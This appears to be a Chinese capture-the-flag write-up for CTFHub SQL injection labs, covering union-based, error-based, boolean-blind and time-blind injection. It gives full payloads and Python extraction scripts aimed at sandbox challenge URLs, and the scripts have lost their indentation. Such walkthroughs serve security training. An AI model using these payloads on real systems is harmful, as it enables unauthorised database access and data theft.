首先输入1
查看回显:
可以看到返回了SQL语句及ID
和Data
数据,查看列数:
1 order by 2 #
1111 union select 11,22 #
1111 union select version(),database() #
11111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
通过group_concat()
函数将所有的表查询出来,得到news
和flag
两个表,继续查询flag
表中的列:
11111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
查询到flag
表中只有flag
一列,查看flag
列中的内容:
11111 union select 1,flag from sqli.flag #
首先尝试输入1
查看回显:
可以看到返回了SQL语句及ID
和Data
数据,因已得知为字符型注入,其注入过程及语句与整形注入一致:
11111' union select 1,flag from sqli.flag #
先输入1
查看回显:
当输入1'
判断注入时,得到报错信息:
输入1 #
验证:
可以判断出为整形的报错注入,查询数据库名:
1 Union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
通过修改limit 0,1
逐个查询表名:
查询出news
和flag
两个表,继续查询flag
表中的列:
1 Union select count(*),concat((select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
1 Union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
先输入1
查看回显内容:
提示查询成功,但不会回显内容,只有查询语句语法错误是才显示error
,尝试查询当前字段长度:
1 order by 2 #
得出当前字段数为2
,因为盲注需要猜解大量内容,使用脚本查询当前数据库名:
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def database_name():
name = ''
for i in range(1, 9):
for j in string.ascii_letters:
url_db = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
r = requests.get(url_db)
if mark in r.text:
name += j
break
print('database_name:', name)
database_name()
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def table_name():
list = []
for i in range(0, 4):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
r = requests.get(url_t)
if mark in r.text:
name += k
break
list.append(name)
print('table_name:', list)
table_name()
得到两个表名:news
和flag
,继续查询flag
表中的列:
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def columns_name():
list = []
for i in range(0, 3):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
r = requests.get(url_c)
if mark in r.text:
name += k
break
list.append(name)
print('column_name:', list)
columns_name()
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def data():
name = ''
for i in range(1, 50):
for j in range(48, 126):
url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (i, j)
r = requests.get(url_d)
if mark in r.text:
name += chr(j)
break
print('data:', name)
data()
什么内容都不返回,尝试使用脚本进行时间盲注,首先获取数据库名:
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def database_name():
name = ''
for i in range(1, 9):
for j in string.ascii_letters:
url_db = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
time_b = time.time()
r = requests.get(url_db)
time_f = time.time()
if time_f-time_b > 2:
name += j
break
print('database_name:', name)
database_name()
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def table_name():
list = []
for i in range(0, 2):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time_b = time.time()
r = requests.get(url_t)
time_f = time.time()
if time_f - time_b > 2:
name += k
break
list.append(name)
print('table_name:', list)
table_name()
得到两个表名:news
和flag
,继续查询flag
表中的列:
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def columns_name():
list = []
for i in range(0, 1):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time_b = time.time()
r = requests.get(url_c)
time_f = time.time()
if time_f - time_b > 2:
name += k
break
list.append(name)
print('column_name:', list)
columns_name()
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def data():
name = ''
for i in range(1, 50):
for j in range(48, 126):
url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
r = requests.get(url_d)
time_b = time.time()
r = requests.get(url_d)
time_f = time.time()
if time_f-time_b > 2:
name += chr(j)
print(name)
break
print('data:', name)
data()
得到flag
:
完成时间盲注